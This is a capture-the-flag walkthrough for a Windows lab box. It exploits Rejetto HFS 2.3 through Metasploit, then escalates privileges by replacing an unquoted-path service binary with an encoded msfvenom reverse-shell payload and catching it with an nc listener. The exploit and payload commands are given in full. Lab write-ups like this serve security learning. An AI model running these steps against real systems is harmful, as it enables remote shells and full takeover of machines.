To begin, run nmap -sC -sV -vv -oN nmap/init [IP_ADDR]
to identify any open ports or potentially vulnerable services. This scan reveals a HTTP server running, as well as Samba, NetBIOS and RPC.
The web server that’s running displays an “Employee of the Month” image. Viewing the source of this shows the image title is “BillHarper.png”. Navigating to port 8080, a file server GUI can be found.
To get more info on this particular file server, select the “HTTPFileServer 2.3” hyperlink to view the documentation. In the documentation, select the “Fork me on Github” link in the top right to identify the type of file server running - Rejetto.
To search for known exploits, use searchsploit rejetto 2.3
or directly search online. The follow is identified via searchsploit
This particular task works with “Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)”.
To run this in Metasploit, execute the following:
search 2014-6287
show options
To use the exploit, the following options need to be configured:
RHOSTS: The IP address of the target.
RPORT: 8080, our target is running on this port.
LHOST: IP address of attacker machine.
Once set, use run
to launch the exploit and receive a Meterpreter session.
Privilege Escalation
PowerUp can be used to search for privilege escalation routes on Windows devices. To place this on the target, run upload /path/to/powerup.ps1
. Once the upload is complete, run load powershell
followed by powershell_shell
in the Meterpreter session, this will allow PowerUp to be run.
This will output a list of services, for this task, focus on services which have “CanRestart” set to “True” and have an unquoted service path containing spaces like the example here where “Path” is set to a location containing spaces and not contained within quotes.
The application directory for this service is writable, meaning the legitimate app can be swapped for a malicious one. The payload to do this can be created with msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=[IP_ADDR] LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o ASCService.exe
To replace the existing service, execute the following commands:
sc stop AdvancedSystemCareService9
copy "C:\Program Files (x86)\IObit\AdvancedSystemCare\ASCService.exe"
Now, start a listener on the attacking machine using nc -nvlp 4443
and reboot the service on the target with sc start AdvancedSystemCare9
. This should catch on the listener as root. Navigating to the administrators desktop and reading the file “root.txt” will reveal the flag for this challenge.
More detailed info on commands etc. used here can be found in my GitBook notes below - happy hacking!